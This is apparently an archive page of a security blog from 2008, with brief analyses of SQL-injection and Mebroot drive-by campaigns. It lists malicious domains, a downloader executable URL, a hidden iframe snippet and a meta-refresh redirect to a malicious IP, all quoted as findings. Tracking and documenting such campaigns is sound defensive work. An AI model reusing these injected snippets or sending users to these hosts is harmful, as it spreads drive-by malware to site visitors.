Archive for September, 2008

www3.ss11qn.cn/csrss/w.js

Posted in sql injection on September 22, 2008 by s3cu

a new round of sql-injection attacks to inject the malicious link.
The w.js script essentially iframe to new.htm
Content of new.htm as follows:
Continue reading

Advertisements

www.ok2bstr8.com/index_13.html

Posted in sql injection on September 11, 2008 by s3cu

the URL contains links to http://www.ok2bstr8.com/view.exe

view.exe is a downloader – VT analysis

The URL also has an iframe embedded:

<iframe id=”01″ src=”2.html” frameborder=”0″ style=”display:none”></iframe>

2.html links to malicious obfuscated JS:

<meta http-equiv=”refresh” content=”2;URL=http://79.135.167.18/cgi-bin/index.cgi?user2″>

The above IP is associated with many domains such as minimal345.com

cdm1djeni.com/cgi-bin/index.cgi?dx

Posted in Mebroot on September 1, 2008 by s3cu

after a series of obfuscated JS, the final decoded content as follows:
Continue reading